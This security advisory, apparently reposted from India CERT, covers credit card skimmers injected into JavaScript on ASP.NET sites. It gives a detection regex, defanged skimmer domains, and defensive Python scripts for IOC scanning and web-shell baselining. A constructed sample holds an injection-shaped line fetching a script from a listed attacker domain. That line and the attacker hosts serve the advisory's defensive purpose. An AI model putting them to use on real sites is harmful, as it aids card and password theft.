Credit Card Skimmer Targets Microsoft ASP.NET Sites
It has been reported that credit card skimming through various e-commerce
sites is spreading worldwide. Attackers typically target e-commerce sites
because of their wide presence, popularity and the LAMP environment (Linux,
Apache, MySQL and PHP) they commonly run on. Recently, attackers targeted
sites hosted on Microsoft's IIS web server running the ASP.NET web
application framework.
It is reported that sports organizations, health and e-commerce websites,
among others, are the sites most affected by this attack, and that they were
identified as running ASP.NET version 4.0.30319, which is no longer
officially supported by Microsoft and may contain multiple known/unknown
vulnerabilities.
In this attack, the attackers remotely appended obfuscated malicious code to
one of the site's legitimate JavaScript libraries, or injected the full
skimming code directly into the compromised JavaScript library. The skimmer
is designed to exfiltrate credit card numbers as well as passwords.
IOC:
Regex to find ASP.NET skimmer injections:
(jquery\w+\|\|undefined;jquery\w+={1,5}undefined&&)|(!window\.jqv\w+&&\(jqv\w+=function\(a\)\{return)
Skimmer hosting sites:
idpcdn-cloud[.]com
joblly[.]com
hixrq[.]net
cdn-xhr[.]com
rackxhr[.]com
thxrq[.]com
hivnd[.]net
31[.]220[.]60[.]108
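The regex and the hosting indicators above can be turned into a simple scanner that a site operator runs over the JavaScript shipped by an IIS/ASP.NET deployment. The following script is an added example written for this advisory, not code from the original post or from any vendor; it embeds the advisory's regex and its defanged indicators, refangs the indicators (replaces "[.]" with ".") so they match real references inside script files, and reports the file and line where either pattern appears. The sample files it scans are constructed for illustration.

```python
import os
import re
from dataclasses import dataclass

# Regex published in the advisory for spotting the ASP.NET skimmer injection.
SKIMMER_INJECTION_RE = re.compile(
    r"(jquery\w+\|\|undefined;jquery\w+={1,5}undefined&&)"
    r"|(!window\.jqv\w+&&\(jqv\w+=function\(a\)\{return)"
)

# Defanged skimmer hosting indicators from the advisory.
DEFANGED_IOCS = [
    "idpcdn-cloud[.]com", "joblly[.]com", "hixrq[.]net", "cdn-xhr[.]com",
    "rackxhr[.]com", "thxrq[.]com", "hivnd[.]net", "31[.]220[.]60[.]108",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ("a[.]b") back into its matchable form ("a.b")."""
    return indicator.replace("[.]", ".")


# One alternation of literal (escaped) indicators; dots are literal, not wildcards.
IOC_RE = re.compile("|".join(re.escape(refang(i)) for i in DEFANGED_IOCS))


@dataclass
class Finding:
    path: str
    line_no: int
    kind: str       # "injection-pattern" or "ioc"
    evidence: str   # the matched text, truncated for readability


def scan_text(path: str, text: str) -> list:
    """Scan one file's contents line by line for the injection regex and the IOCs."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in SKIMMER_INJECTION_RE.finditer(line):
            findings.append(Finding(path, line_no, "injection-pattern", m.group(0)[:80]))
        for m in IOC_RE.finditer(line):
            findings.append(Finding(path, line_no, "ioc", m.group(0)))
    return findings


def scan_directory(root: str, extensions=(".js", ".aspx", ".html", ".htm", ".cshtml")) -> list:
    """Walk a web root and scan every file whose extension may carry script."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(extensions):
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(full, fh.read()))
    return findings


# Constructed sample files: one clean library, one with an appended injection that
# also references a listed domain, one with the second injection variant.
SAMPLE_FILES = {
    "scripts/jquery.min.js": "/*! jQuery v3.4.1 */\n!function(e,t){\"use strict\"}();\n",
    "scripts/app.js": (
        "var total=0;\n"
        "jqueryabc||undefined;jqueryabc=undefined&&(function(){"
        "fetch('https://idpcdn-cloud.com/a.js')})();\n"
    ),
    "scripts/vendor.js": "!window.jqvz&&(jqvz=function(a){return a})\n",
}


def scan_samples() -> dict:
    """Run the scanner over the constructed samples; returns {path: [Finding, ...]}."""
    return {path: scan_text(path, text) for path, text in SAMPLE_FILES.items()}


if __name__ == "__main__":
    for path, findings in scan_samples().items():
        for f in findings:
            print(f"{f.path}:{f.line_no} [{f.kind}] {f.evidence}")
```

Point `scan_directory()` at the IIS web root (or at a copy of it taken during incident response) to scan real files; a hit on the injection pattern is strong evidence of a tampered library and the file should be restored from a known-good build rather than hand-edited.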
Best practices:
Use the latest version of the ASP.NET web framework, IIS web server and
database server.
Apply appropriate updates/patches to the OS and application software as and
when they are made available by the OEM.
Restrict/deny all access by default and only allow access that is absolutely
necessary.
Conduct a complete security audit of the web application, web server and
database server periodically and after every major configuration change, and
plug the vulnerabilities found.
Deploy Security Information and Event Management (SIEM) and/or Database
Activity Monitoring (DAM) solutions.
Search all websites hosted on the web server, or sharing the same database
server, for malicious web shells or any other artefacts.
Periodically check the web server directories for malicious/unknown web
shell files and remove them as soon as they are noticed.
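The last two practices, checking web server directories for unknown files, are easiest to carry out against a recorded baseline. The following script is an added example, not part of the advisory and not a vendor tool: it hashes every file under a web root, stores the result as JSON, and on a later run reports files that were added, modified or removed, flagging any new or changed file whose extension IIS would hand to a server-side handler (.aspx, .ashx, .asmx, .asp, .config) as high priority, since a web shell dropped into an images or uploads directory looks exactly like that. The demo scenario it builds in a temporary directory is constructed for illustration.

```python
import hashlib
import json
import os
import tempfile

# Extensions IIS routes to a server-side handler; a new file of this kind outside the
# application's expected code directories is the classic shape of a dropped web shell.
SERVER_EXECUTABLE_EXTS = {".aspx", ".ashx", ".asmx", ".asp", ".config"}


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Map every file under root (path relative to root, '/'-separated) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_of(full)
    return baseline


def save_baseline(baseline: dict, path: str) -> None:
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(baseline, fh, indent=2, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh)


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots; high_priority lists added/modified server-executable files."""
    report = {"added": [], "modified": [], "removed": [], "high_priority": []}
    for rel, digest in current.items():
        if rel not in baseline:
            report["added"].append(rel)
        elif baseline[rel] != digest:
            report["modified"].append(rel)
    report["removed"] = [rel for rel in baseline if rel not in current]
    for rel in report["added"] + report["modified"]:
        if os.path.splitext(rel)[1].lower() in SERVER_EXECUTABLE_EXTS:
            report["high_priority"].append(rel)
    for key in report:
        report[key].sort()
    return report


def _write(root: str, rel: str, text: str) -> None:
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo() -> dict:
    """Constructed scenario: baseline a small site, then tamper with it and re-scan."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "Default.aspx", "<%@ Page Language=\"C#\" %>\n")
        _write(root, "Scripts/app.js", "var total=0;\n")
        _write(root, "images/logo.png", "not really a png\n")
        baseline = build_baseline(root)
        # Simulated tampering: a library is modified and a handler appears under images/.
        _write(root, "Scripts/app.js", "var total=0;\n/* appended payload would go here */\n")
        _write(root, "images/upload.aspx", "<%@ Page Language=\"C#\" %>\n")
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In production, run `build_baseline()` immediately after a known-good deployment, store the JSON somewhere the web server account cannot write, and schedule `compare()` against a fresh snapshot; anything in `high_priority` should be treated as a possible web shell until the file's origin is confirmed.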
References:
argets-asp-net-sites/
About Cert Advisory
We have created this blog to provide the latest security advisories from the India CERT on security vulnerabilities, threats, attacks and the patching required to mitigate any kind of cyber attack.